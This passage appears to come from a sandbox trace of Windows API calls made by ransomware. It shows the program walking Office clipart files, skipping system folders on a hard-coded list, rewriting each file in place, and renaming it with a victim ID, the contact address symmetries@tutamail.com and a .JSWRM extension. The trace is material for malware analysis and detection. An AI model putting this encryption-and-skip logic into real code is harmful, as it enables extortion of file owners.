hHeap=0x1e0000) returned 1 [0075.068] CloseHandle (hObject=0x460) returned 1 [0075.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0075.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0075.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0075.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0075.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0075.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.069] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00296_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00296_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00296_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0075.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.069] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x332e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00390_.WMF", cAlternateFileName="")) returned 1 [0075.069] lstrcmpiW (lpString1="BL00390_.WMF", lpString2=".") returned 1 [0075.069] lstrcmpiW (lpString1="BL00390_.WMF", lpString2="..") returned 1 [0075.069] lstrcmpiW (lpString1="BL00390_.WMF", lpString2="...") returned 1 [0075.069] lstrcmpiW (lpString1="BL00390_.WMF", lpString2="windows") returned -1 [0075.069] lstrcmpiW (lpString1="BL00390_.WMF", lpString2="recovery") returned -1 [0075.069] lstrcmpiW (lpString1="BL00390_.WMF", lpString2="perflogs") returned -1 [0075.070] lstrcmpiW (lpString1="BL00390_.WMF", lpString2="documents and settings") returned -1 [0075.070] lstrcmpiW (lpString1="BL00390_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.070] lstrcmpiW (lpString1="BL00390_.WMF", lpString2="system volume information") returned -1 [0075.070] lstrcmpiW (lpString1="BL00390_.WMF", lpString2="msocache") returned -1 [0075.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0075.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00390_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00390_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00390_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0075.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0075.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00390_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00390_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00390_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0075.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.070] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00390_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.071] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13102) returned 1 [0075.071] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3320) returned 0x24c1d0 [0075.071] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x3320, lpOverlapped=0x0) returned 1 [0075.073] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.073] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x3320, lpOverlapped=0x0) returned 1 [0075.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.073] CloseHandle (hObject=0x460) returned 1 [0075.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0075.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0075.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0075.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0075.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0075.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.074] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00390_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00390_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0075.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.074] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd685b3d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd685b3d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x69aa, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00392_.WMF", cAlternateFileName="")) returned 1 [0075.074] lstrcmpiW (lpString1="BL00392_.WMF", lpString2=".") returned 1 [0075.075] lstrcmpiW (lpString1="BL00392_.WMF", lpString2="..") returned 1 [0075.075] lstrcmpiW (lpString1="BL00392_.WMF", lpString2="...") returned 1 [0075.075] lstrcmpiW (lpString1="BL00392_.WMF", lpString2="windows") returned -1 [0075.075] lstrcmpiW (lpString1="BL00392_.WMF", lpString2="recovery") returned -1 [0075.075] lstrcmpiW (lpString1="BL00392_.WMF", lpString2="perflogs") returned -1 [0075.075] lstrcmpiW (lpString1="BL00392_.WMF", lpString2="documents and settings") returned -1 [0075.075] lstrcmpiW (lpString1="BL00392_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.075] lstrcmpiW (lpString1="BL00392_.WMF", lpString2="system volume information") returned -1 [0075.075] lstrcmpiW (lpString1="BL00392_.WMF", lpString2="msocache") returned -1 [0075.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0075.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00392_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00392_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00392_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0075.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0075.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00392_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00392_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00392_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0075.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.075] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00392_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.076] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=27050) returned 1 [0075.076] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x69a0) returned 0x24c1d0 [0075.076] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x69a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x69a0, lpOverlapped=0x0) returned 1 [0075.079] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.080] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x69a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x69a0, lpOverlapped=0x0) returned 1 [0075.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.080] CloseHandle (hObject=0x460) returned 1 [0075.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0075.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0075.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0075.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0075.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0075.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.080] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00392_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00392_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0075.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.081] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd685b3d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd685b3d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b54, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00524_.WMF", cAlternateFileName="")) returned 1 [0075.081] lstrcmpiW (lpString1="BL00524_.WMF", lpString2=".") returned 1 [0075.081] lstrcmpiW (lpString1="BL00524_.WMF", lpString2="..") returned 1 [0075.081] lstrcmpiW (lpString1="BL00524_.WMF", lpString2="...") returned 1 [0075.081] lstrcmpiW (lpString1="BL00524_.WMF", lpString2="windows") returned -1 [0075.081] lstrcmpiW (lpString1="BL00524_.WMF", lpString2="recovery") returned -1 [0075.081] lstrcmpiW (lpString1="BL00524_.WMF", lpString2="perflogs") returned -1 [0075.081] lstrcmpiW (lpString1="BL00524_.WMF", lpString2="documents and settings") returned -1 [0075.081] lstrcmpiW (lpString1="BL00524_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.081] lstrcmpiW (lpString1="BL00524_.WMF", lpString2="system volume information") returned -1 [0075.081] lstrcmpiW (lpString1="BL00524_.WMF", lpString2="msocache") returned -1 [0075.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0075.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00524_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00524_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00524_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0075.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0075.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00524_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00524_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00524_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0075.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.082] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00524_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.082] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6996) returned 1 [0075.082] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b50) returned 0x24c1d0 [0075.082] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1b50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1b50, lpOverlapped=0x0) returned 1 [0075.084] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.084] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1b50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1b50, lpOverlapped=0x0) returned 1 [0075.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.084] CloseHandle (hObject=0x460) returned 1 [0075.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0075.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0075.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0075.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0075.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0075.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0075.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0075.085] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF" 